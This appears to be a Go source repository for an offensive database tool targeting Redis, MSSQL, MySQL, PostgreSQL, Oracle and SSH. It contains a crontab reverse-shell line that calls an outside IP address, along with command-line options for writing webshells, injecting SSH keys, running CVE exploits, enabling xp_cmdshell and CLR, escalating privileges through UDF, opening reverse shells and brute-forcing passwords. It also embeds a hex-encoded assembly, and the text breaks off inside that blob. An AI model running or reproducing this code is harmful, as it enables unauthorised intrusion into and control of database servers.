├── .gitattributes ├── crontab.txt ├── driver └── instantclient_21_8.zip ├── exp.dll ├── exp.so ├── go.mod ├── go.sum ├── main.go ├── out.json ├── pac ├── help.go ├── logger.go ├── mssql_CLR.go ├── mssql_cmd.go ├── mssql_connect.go ├── mssql_spoacreate.go ├── mssql_webshell.go ├── mssql_xpcmdshell.go ├── mysql_cmd.go ├── mysql_connect.go ├── mysql_udf.go ├── mysql_webshell.go ├── oracl_xmlquery.go ├── oracle_cmd.go ├── oracle_connect.go ├── oracle_export_extension.go ├── oracle_funcall.go ├── other.go ├── postgre_cmd.go ├── postgre_connect.go ├── postgre_cve_2019_9193.go ├── postgre_fileread.go ├── postgre_write.go ├── redis_cmd.go ├── redis_connect.go ├── redis_export.go ├── redis_getshell.go ├── redis_lua.go ├── redis_slave.go ├── redis_string.go ├── redis_tcp.go └── ssh_connect.go ├── readme.md ├── shell.txt ├── shell ├── shell.asp ├── shell.aspx ├── shell.jsp └── shell.php └── ssh.txt /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /crontab.txt: -------------------------------------------------------------------------------- 1 | */1 * * * * bash -i >& /dev/tcp/175.178.233.198/8881 0>&1 -------------------------------------------------------------------------------- /driver/instantclient_21_8.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AduraK2/Databasetools/ffb28b8552583b9015f07da2073bf8e728018475/driver/instantclient_21_8.zip -------------------------------------------------------------------------------- /exp.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AduraK2/Databasetools/ffb28b8552583b9015f07da2073bf8e728018475/exp.dll -------------------------------------------------------------------------------- 
/exp.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AduraK2/Databasetools/ffb28b8552583b9015f07da2073bf8e728018475/exp.so -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module Databasetools 2 | 3 | go 1.19 4 | 5 | require ( 6 | github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5 7 | github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394 8 | github.com/denisenkom/go-mssqldb v0.12.3 9 | github.com/go-redis/redis/v8 v8.11.5 10 | github.com/go-sql-driver/mysql v1.7.0 11 | github.com/godror/godror v0.36.0 12 | github.com/lib/pq v1.10.7 13 | golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d 14 | golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2 15 | ) 16 | 17 | require ( 18 | github.com/cespare/xxhash/v2 v2.1.2 // indirect 19 | github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f // indirect 20 | github.com/go-logfmt/logfmt v0.5.1 // indirect 21 | github.com/go-logr/logr v1.2.3 // indirect 22 | github.com/godror/knownpb v0.1.0 // indirect 23 | github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe // indirect 24 | github.com/golang-sql/sqlexp v0.1.0 // indirect 25 | golang.org/x/sys v0.0.0-20211216021012-1d35b9e2eb4e // indirect 26 | golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 // indirect 27 | google.golang.org/protobuf v1.28.1 // indirect 28 | ) 29 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/Azure/azure-sdk-for-go/sdk/azcore v0.19.0/go.mod h1:h6H6c8enJmmocHUbLiiGY6sx7f9i+X3m1CHdd5c6Rdw= 2 | github.com/Azure/azure-sdk-for-go/sdk/azidentity v0.11.0/go.mod h1:HcM1YX14R7CJcghJGOYCgdezslRSVzqwLf/q+4Y2r/0= 3 | github.com/Azure/azure-sdk-for-go/sdk/internal v0.7.0/go.mod 
h1:yqy467j36fJxcRV2TzfVZ1pCb5vxm4BtZPUdYWe/Xo8= 4 | github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5 h1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio= 5 | github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5/go.mod h1:wHh0iHkYZB8zMSxRWpUBQtwG5a7fFgvEO+odwuTv2gs= 6 | github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394 h1:OYA+5W64v3OgClL+IrOD63t4i/RW7RqrAVl9LTZ9UqQ= 7 | github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394/go.mod h1:Q8n74mJTIgjX4RBBcHnJ05h//6/k6foqmgE45jTQtxg= 8 | github.com/cespare/xxhash/v2 v2.1.2 h1:YRXhKfTDauu4ajMg1TPgFO5jnlC2HCbmLXMcTG5cbYE= 9 | github.com/cespare/xxhash/v2 v2.1.2/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= 10 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 11 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 12 | github.com/denisenkom/go-mssqldb v0.12.3 h1:pBSGx9Tq67pBOTLmxNuirNTeB8Vjmf886Kx+8Y+8shw= 13 | github.com/denisenkom/go-mssqldb v0.12.3/go.mod h1:k0mtMFOnU+AihqFxPMiF05rtiDrorD1Vrm1KEz5hxDo= 14 | github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f h1:lO4WD4F/rVNCu3HqELle0jiPLLBs70cWOduZpkS1E78= 15 | github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f/go.mod h1:cuUVRXasLTGF7a8hSLbxyZXjz+1KgoB3wDUb6vlszIc= 16 | github.com/dnaeon/go-vcr v1.2.0/go.mod h1:R4UdLID7HZT3taECzJs4YgbbH6PIGXB6W/sc5OLb6RQ= 17 | github.com/fsnotify/fsnotify v1.4.9 h1:hsms1Qyu0jgnwNXIxa+/V/PDsU6CfLf6CNO8H7IWoS4= 18 | github.com/go-logfmt/logfmt v0.5.1 h1:otpy5pqBCBZ1ng9RQ0dPu4PN7ba75Y/aA+UpowDyNVA= 19 | github.com/go-logfmt/logfmt v0.5.1/go.mod h1:WYhtIu8zTZfxdn5+rREduYbwxfcBr/Vr6KEVveWlfTs= 20 | github.com/go-logr/logr v1.2.3 h1:2DntVwHkVopvECVRSlL5PSo9eG+cAkDCuckLubN+rq0= 21 | github.com/go-logr/logr v1.2.3/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= 22 | github.com/go-redis/redis/v8 v8.11.5 h1:AcZZR7igkdvfVmQTPnu9WE37LRrO/YrBH5zWyjDC0oI= 23 | github.com/go-redis/redis/v8 
v8.11.5/go.mod h1:gREzHqY1hg6oD9ngVRbLStwAWKhA0FEgq8Jd4h5lpwo= 24 | github.com/go-sql-driver/mysql v1.7.0 h1:ueSltNNllEqE3qcWBTD0iQd3IpL/6U+mJxLkazJ7YPc= 25 | github.com/go-sql-driver/mysql v1.7.0/go.mod h1:OXbVy3sEdcQ2Doequ6Z5BW6fXNQTmx+9S1MCJN5yJMI= 26 | github.com/godror/godror v0.36.0 h1:4kymETiaTOJcyF5+47JSUs44Pi0R9bTwsWtBTWqAVRs= 27 | github.com/godror/godror v0.36.0/go.mod h1:jW1+pN+z/V0h28p9XZXVNtEvfZP/2EBfaSjKJLp3E4g= 28 | github.com/godror/knownpb v0.1.0 h1:dJPK8s/I3PQzGGaGcUStL2zIaaICNzKKAK8BzP1uLio= 29 | github.com/godror/knownpb v0.1.0/go.mod h1:4nRFbQo1dDuwKnblRXDxrfCFYeT4hjg3GjMqef58eRE= 30 | github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe h1:lXe2qZdvpiX5WZkZR4hgp4KJVfY3nMkvmwbVkpv1rVY= 31 | github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0= 32 | github.com/golang-sql/sqlexp v0.1.0 h1:ZCD6MBpcuOVfGVqsEmY5/4FtYiKz6tSyUv9LPEDei6A= 33 | github.com/golang-sql/sqlexp v0.1.0/go.mod h1:J4ad9Vo8ZCWQ2GMrC4UCQy1JpCbwU9m3EOqtpKwwwHI= 34 | github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= 35 | github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= 36 | github.com/google/go-cmp v0.5.8 h1:e6P7q2lk1O+qJJb4BtCQXlK8vWEO8V1ZeuEdJNOqZyg= 37 | github.com/lib/pq v1.10.7 h1:p7ZhMD+KsSRozJr34udlUrhboJwWAgCg34+/ZZNvZZw= 38 | github.com/lib/pq v1.10.7/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o= 39 | github.com/modocache/gover v0.0.0-20171022184752-b58185e213c5/go.mod h1:caMODM3PzxT8aQXRPkAt8xlV/e7d7w8GM5g0fa5F0D8= 40 | github.com/nxadm/tail v1.4.8 h1:nPr65rt6Y5JFSKQO7qToXr7pePgD6Gwiw05lkbyAQTE= 41 | github.com/oklog/ulid/v2 v2.0.2 h1:r4fFzBm+bv0wNKNh5eXTwU7i85y5x+uwkxCUTNVQqLc= 42 | github.com/onsi/ginkgo v1.16.5 h1:8xi0RTUf59SOSfEtZMvwTvXYMzG4gV23XVHOZiXNtnE= 43 | github.com/onsi/gomega v1.18.1 h1:M1GfJqGRrBrrGGsbxzV5dqM2U2ApXefZCQpkukxYRLE= 44 | github.com/pkg/browser v0.0.0-20180916011732-0a3d74bf9ce4/go.mod 
h1:4OwLy04Bl9Ef3GJJCoec+30X3LQs/0/m4HFRt/2LUSA= 45 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 46 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 47 | github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 48 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= 49 | golang.org/x/crypto v0.0.0-20201016220609-9e8e0b390897/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= 50 | golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d h1:sK3txAijHtOK88l68nt020reeT1ZdKLIYetKl95FzVY= 51 | golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= 52 | golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 53 | golang.org/x/net v0.0.0-20210610132358-84b48f89b13b/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= 54 | golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2 h1:CIJ76btIcR3eFI5EgSo6k1qKw9KJexJuRLI9G7Hp5wE= 55 | golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= 56 | golang.org/x/sync v0.0.0-20220513210516-0976fa681c29 h1:w8s32wxx3sY+OjLlv9qltkLU5yvJzxjjgiHWLjdIcw4= 57 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 58 | golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 59 | golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 60 | golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 61 | golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 62 | golang.org/x/sys v0.0.0-20211216021012-1d35b9e2eb4e h1:fLOSk5Q00efkSvAm+4xcoXD+RRmLmmulPn5I3Y9F2EM= 63 
| golang.org/x/sys v0.0.0-20211216021012-1d35b9e2eb4e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 64 | golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E= 65 | golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= 66 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= 67 | golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M= 68 | golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= 69 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= 70 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 71 | google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= 72 | google.golang.org/protobuf v1.28.1 h1:d0NfwRgPtno5B1Wa6L2DAG+KivqkdutMf1UhdNx175w= 73 | google.golang.org/protobuf v1.28.1/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I= 74 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 75 | gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7 h1:uRGJdciOHaEIrze2W8Q3AKkepLTh2hOroT7a+7czfdQ= 76 | gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= 77 | gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= 78 | gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= 79 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 80 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 81 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | 
"Databasetools/pac" 5 | ) 6 | 7 | func main() { 8 | pac.Help() 9 | } 10 | -------------------------------------------------------------------------------- /out.json: -------------------------------------------------------------------------------- 1 | {"string":null,"hash":null,"set":null,"list":null,"zset":null} -------------------------------------------------------------------------------- /pac/help.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "database/sql" 5 | "flag" 6 | "fmt" 7 | "strings" 8 | ) 9 | 10 | var ( 11 | // 连接状态 12 | conn *sql.DB 13 | sign bool 14 | 15 | // redis 16 | Ruser string 17 | Rhost string 18 | Rport string 19 | Lhost string 20 | Lport string 21 | PWD string 22 | 23 | dump_ bool 24 | import_ bool 25 | shell bool 26 | crontab bool 27 | sshkey bool 28 | lua bool 29 | exec bool 30 | 31 | console bool 32 | cli bool 33 | del bool 34 | 35 | Redis bool 36 | 37 | dll string 38 | CMD string 39 | 40 | DoCMD bool 41 | 42 | cmd string 43 | 44 | // mssql 45 | MSsql bool 46 | isXP bool 47 | isSP bool 48 | isCLR bool 49 | console2 bool 50 | logshell bool 51 | difshell bool 52 | path string 53 | e string 54 | 55 | // SSH 56 | SSH bool 57 | 58 | // Mysql 59 | Mysql bool 60 | IntoOutFileShell bool 61 | LogShell bool 62 | UDF bool 63 | 64 | // Postgre 65 | Postgre bool 66 | CVE20199193 bool 67 | file string 68 | Read1 bool 69 | Read2 bool 70 | list bool 71 | uploadPath string 72 | Write bool 73 | Webshell string 74 | 75 | // Oracle 76 | Oracle bool 77 | sid string 78 | dbms_export_extension bool 79 | dbms_xmlquery_newcontext bool 80 | Funcall bool 81 | reverse bool 82 | 83 | // Crack 84 | Crack bool 85 | m string 86 | ) 87 | 88 | func init() { 89 | flag.StringVar(&Rhost, "rhost", "", "目标 IP") 90 | flag.StringVar(&Rport, "rport", "6379", "目标端口") 91 | flag.StringVar(&Lhost, "lhost", "", "vps") 92 | flag.StringVar(&Lport, "lport", "", "监听端口") 93 | flag.StringVar(&PWD, "pwd", "", 
"数据库密码") 94 | flag.BoolVar(&cli, "cli", false, "连接数据库shell") 95 | flag.BoolVar(&DoCMD, "docmd", false, "出现该参数表示要执行单条命令") 96 | flag.StringVar(&cmd, "cmd", "", "执行单条命令") 97 | flag.BoolVar(&del, "del", false, "卸载命令执行函数") 98 | 99 | flag.BoolVar(&Redis, "redis", false, "存在该参数表示连接redis数据库") 100 | 101 | flag.BoolVar(&dump_, "dump", false, "导出 Redis 数据") 102 | flag.BoolVar(&import_, "import", false, "导入 Redis 数据") 103 | flag.BoolVar(&exec, "exec", false, "主从复制-命令执行") 104 | flag.BoolVar(&shell, "shell", false, "写 Webshell (需要知道物理路径)") 105 | flag.BoolVar(&crontab, "crontab", false, "Linux 定时任务反弹 Shell (适用于centos,ubuntu可能不行)") 106 | flag.BoolVar(&sshkey, "sshkey", false, "Linux写 SSH 公钥 (先生成ssh公钥)") 107 | flag.BoolVar(&lua, "lua", false, "Lua沙盒绕过命令执行 CVE-2022-0543") 108 | flag.BoolVar(&console, "console", false, "使用交互式 shell") 109 | 110 | flag.StringVar(&dll, "so", "exp.dll", "设置 exp.dll | exp.so") 111 | 112 | //mssql 113 | flag.BoolVar(&MSsql, "mssql", false, "存在该参数表示连接mssql数据库") 114 | //mssql xpcmdshell 115 | flag.BoolVar(&isXP, "isxp", false, "判断是否存在xp_cmdshell,存在则开启") 116 | //mssql sp_oacreate 117 | flag.BoolVar(&isSP, "issp", false, "判断是否存在sp_oacreate,存在则开启") 118 | // mssql CLR 119 | flag.BoolVar(&isCLR, "isclr", false, "开启clr") 120 | flag.BoolVar(&console2, "console2", false, "sp_oacreate使用exec直接回显") 121 | // getshell 122 | flag.BoolVar(&logshell, "logshell", false, "通过日志备份getshell") 123 | flag.BoolVar(&difshell, "difshell", false, "通过差异备份getshell") 124 | flag.StringVar(&path, "path", "", "网站物理路径") 125 | flag.StringVar(&e, "e", "", "webshell脚本类型") 126 | 127 | // SSH 128 | flag.BoolVar(&SSH, "ssh", false, "ssh连接") 129 | flag.StringVar(&Ruser, "ruser", "root", "目标主机用户名") 130 | 131 | // Mysql 132 | flag.BoolVar(&Mysql, "mysql", false, "Mysql数据库") 133 | flag.BoolVar(&IntoOutFileShell, "outfileshell", false, "通过into outfile写入webshell") 134 | flag.BoolVar(&LogShell, "generallog", false, "通过修改日志存储位置getshell") 135 | flag.BoolVar(&UDF, "udf", false, "udf提权") 136 | 137 | // 
postgre 138 | flag.BoolVar(&Postgre, "postgre", false, "Postgre数据库") 139 | flag.BoolVar(&CVE20199193, "CVE20199193", false, "CVE-2019-9193提权") 140 | flag.StringVar(&file, "file", "", "需要读取的文件名称") 141 | flag.BoolVar(&Read1, "read1", false, "创建数据表存储读取内容") 142 | flag.BoolVar(&Read2, "read2", false, "利用postgresql大对象来处理读文件") 143 | flag.BoolVar(&list, "list", false, "列目录") 144 | flag.BoolVar(&Write, "write", false, "上传文件") 145 | flag.StringVar(&uploadPath, "uploadpath", "", "Webshell上传的路径") 146 | 147 | // Oracle 148 | flag.BoolVar(&Oracle, "oracle", false, "选择oracle数据库") 149 | flag.StringVar(&sid, "sid", "", "Oracle数据库名") 150 | flag.BoolVar(&dbms_export_extension, "dee", false, "使用dbms_export_extension注入漏洞执行命令") 151 | flag.BoolVar(&reverse, "re", false, "使用dbms_export_extension注入漏洞反弹shell") 152 | flag.BoolVar(&dbms_xmlquery_newcontext, "dx", false, "使用dbms_xmlquery_newcontext执行命令(dbms_export_extension存在漏洞前提下)") 153 | flag.BoolVar(&Funcall, "fc", false, "使用dbms_java_test.funcall()反弹shell") 154 | 155 | // Crack 156 | flag.BoolVar(&Crack, "crack", false, "爆破参数") 157 | flag.StringVar(&m, "m", "", "爆破的数据库类型") 158 | 159 | } 160 | 161 | func Help() { 162 | flag.Parse() 163 | if Redis { 164 | err := RedisClient(PWD) 165 | if err != nil { 166 | if strings.Contains(err.Error(), "context deadline exceeded") { 167 | Info("Redis 连接超时") 168 | } 169 | if strings.Contains(err.Error(), "NOAUTH Authentication required.") { 170 | Info("Redis 需要密码认证") 171 | } 172 | if strings.Contains(err.Error(), "ERR invalid password") { 173 | Info("Redis 认证密码错误!") 174 | } 175 | return 176 | } 177 | switch { 178 | case exec: 179 | if Lhost == "" { 180 | Info("缺少Lhost参数") 181 | } 182 | if console { 183 | RedisSlave() 184 | loopCmd("exec") 185 | } else { 186 | RedisSlave() 187 | RunCmd(CMD) 188 | CloseSlave("exec") 189 | } 190 | case dump_: 191 | handle_export() 192 | case import_: 193 | handle_import() 194 | case cli: 195 | loopRedis() 196 | case shell: 197 | echo("getshell", "./shell.txt") 198 | case 
crontab: 199 | echo("crontab", "./crontab.txt") 200 | case sshkey: 201 | echo("ssh", "./ssh.txt") 202 | case lua: 203 | if console { 204 | loopCmd("lua") 205 | } else { 206 | if CMD == "" { 207 | Info("缺少 cmd 参数, 无法执行命令哦") 208 | return 209 | } 210 | RedisLua(CMD) 211 | } 212 | } 213 | } else if MSsql { 214 | _, conn, _ := MssqlConnect(Rhost, Rport, Ruser, PWD) 215 | MssqlCMD("select @@version;", conn) 216 | Success("连接成功!") 217 | switch { 218 | case cli: 219 | loopMssqlCMD(conn) 220 | // xp_cmdshell 221 | case isXP: 222 | if console { 223 | MssqlCMDConsole(conn) 224 | } else if DoCMD { 225 | MssqlCMDone(cmd, conn) 226 | } else { 227 | MssqlXpcmdshell(conn) 228 | } 229 | // sp_oacreate 230 | case isSP: 231 | if console { 232 | CMDconsole_Spoacreate(conn) 233 | } else if console2 { 234 | CMDconsole_Spoacreate_two(conn) 235 | } else if DoCMD { 236 | CMDone_Spoacreate(cmd, conn) 237 | } else { 238 | OpenSpoacreate(conn) 239 | //Getresult(table, conn) 240 | } 241 | // CLR 242 | case isCLR: 243 | if console { 244 | CMDconsole_CLR(conn) 245 | } else if DoCMD { 246 | CMDone_CLR(cmd, conn) 247 | } else if del { 248 | DeleteWarSQLKit(conn) 249 | } else { 250 | MssqlCLR(conn) 251 | } 252 | // getshell 253 | case logshell: 254 | // Webshell_choice(conn) 255 | Choice("1", conn, e) 256 | case difshell: 257 | Choice("2", conn, e) 258 | default: 259 | Info("无功能参数,默认输出") 260 | } 261 | } else if SSH { 262 | SSHConnect(Ruser, Rhost, PWD) 263 | } else if Mysql { 264 | err, conn, _ := MysqlConnect(Ruser, Rhost, PWD, Rport) 265 | m, err := MysqlCMD("select @@version;", conn) 266 | fmt.Printf("数据库版本:Mysql %v\n", m[0]["@@version"]) 267 | if err != nil { 268 | Info("连接错误") 269 | Err(err) 270 | } 271 | switch { 272 | case cli: 273 | loopMysqlCMD(conn) 274 | case shell: 275 | if IntoOutFileShell { 276 | Webshell_IntoOutFile(conn, path) 277 | } else if LogShell { 278 | Webshell_logshell(conn, path) 279 | } 280 | case UDF: 281 | UdfPrivilege(conn) 282 | } 283 | } else if Postgre { 284 | conn, 
_ := postgre_connect(Rhost, Rport, Ruser, PWD) 285 | result, err := postgrecmd("select version();", conn) 286 | if err != nil { 287 | Err(err) 288 | } 289 | Info(fmt.Sprintf("数据库版本:%s", result[0]["version"])) 290 | postgreisdba(conn) 291 | switch { 292 | case cli: 293 | loopPostgreCMD(conn) 294 | case CVE20199193: 295 | if console { 296 | cve_2019_9193_console(conn) 297 | } else { 298 | cve_2019_9193_cmd(cmd, conn) 299 | } 300 | case Read1: 301 | if console { 302 | loopPostgreFileRead(conn) 303 | } else { 304 | PostgreFileRead(conn, file) 305 | } 306 | case Read2: 307 | if console { 308 | loopPostgreFileReadhex(conn) 309 | } else { 310 | PostgreFileReadhex(conn, file) 311 | } 312 | case list: 313 | if console { 314 | loopPostgreListDirectoy(conn) 315 | } else { 316 | PostgreListDirectoy(conn, file) 317 | } 318 | case Write: 319 | WriteFile(conn, uploadPath, e) 320 | } 321 | } else if Oracle { 322 | conn, err, _ := OracleConnect(Ruser, PWD, Rhost, Rport, sid) 323 | if err != nil { 324 | Err(err) 325 | } 326 | resultSet, err := OracleCMD(fmt.Sprintf("select version from v$instance"), conn) 327 | for _, m := range resultSet { 328 | for _, value := range m { 329 | Info(fmt.Sprintf("当前数据库版本为:%s", value)) 330 | } 331 | } 332 | isdba, err := OracleCMD("select userenv('ISDBA') from dual", conn) 333 | for _, m := range isdba { 334 | for _, value := range m { 335 | fmt.Println(fmt.Sprintf("%s", value)) 336 | if strings.ToLower(fmt.Sprintf("%s", value)) == "true" { 337 | Success("当前账号为DBA权限") 338 | } else { 339 | Info("当前账号非DBA权限") 340 | } 341 | } 342 | } 343 | switch { 344 | case cli: 345 | loopOracleCMD(conn) 346 | case dbms_export_extension: 347 | if console { 348 | OracleExportExtensionConsole(conn) 349 | } else if DoCMD { 350 | OracleExportExtensionCMD(cmd, conn) 351 | } else if reverse { 352 | OracleExportExtensionReverse(conn, Lhost, Lport) 353 | } 354 | case del: 355 | DropFucnction(conn) 356 | case dbms_xmlquery_newcontext: 357 | if console { 358 | 
OracleXMLQueryConsole(conn) 359 | } else if DoCMD { 360 | OracleXMLQueryCMD(cmd, conn) 361 | } 362 | case Funcall: 363 | OracleFuncCallReverse(conn, Lhost, Lport) 364 | } 365 | } else if Crack { 366 | if m == "mysql" { 367 | MysqlCrack(Rhost, Rport) 368 | } else if m == "mssql" { 369 | MssqlCrack(Rhost, Rport) 370 | } else if m == "postgresql" { 371 | PostgreCrack(Rhost, Rport) 372 | } else if m == "redis" { 373 | ReddisCrack() 374 | } else if m == "oracle" { 375 | OracleCrack(Rhost, Rport) 376 | } 377 | } 378 | } 379 | -------------------------------------------------------------------------------- /pac/logger.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "log" 5 | ) 6 | 7 | const ( 8 | pINFO = "[*] " 9 | pSUCCESS = "[+] " 10 | pErr = "[-] " 11 | ) 12 | 13 | func Info(format string) { 14 | log.Println(pINFO, format) 15 | } 16 | 17 | func Err(format error) { 18 | log.Println(pErr, format) 19 | } 20 | 21 | func Success(format interface{}) { 22 | log.Println(pSUCCESS, format) 23 | } 24 | -------------------------------------------------------------------------------- /pac/mssql_CLR.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "bufio" 5 | "database/sql" 6 | "fmt" 7 | "os" 8 | "strings" 9 | ) 10 | 11 | // 判断是否开启CLR 12 | func MssqlCLR(conn *sql.DB) (err error) { 13 | 14 | sqlstr1 := "exec sp_configure 'show advanced options', 1;RECONFIGURE;Exec sp_configure 'clr enabled', 1;RECONFIGURE;" 15 | MssqlCMD(sqlstr1, conn) 16 | Info("exec sp_configure 'show advanced options', 1;RECONFIGURE;Exec sp_configure 'clr enabled', 1;RECONFIGURE;执行") 17 | 18 | sqlstr2 := "ALTER DATABASE [master] SET TRUSTWORTHY ON;" 19 | MssqlCMD(sqlstr2, conn) 20 | Info("ALTER DATABASE [master] SET TRUSTWORTHY ON;执行") 21 | 22 | clr := 
"0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c0103006643f55f0000000000000000e00022200b013000000e00000006000000000000022d0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000b02c00004f00000000400000b803000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000080d000000200000000e000000020000000000000000000000000000200000602e72737263000000b8030000004000000004000000100000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000e42c00000000000048000000020005005c220000540a00000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000be280e00000a72010000706f0f00000a280e00000a7243000070725300007002281000000a28020000066f0f00000a2a1b300600a40100000100001173040000060a731100000a0b076f1200000a026f1300000a03281400000a2d0c076f1200000a036f1500000a076f1200000a176f1600000a076f1200000a176f1700000a076f1200000a166f1800000a0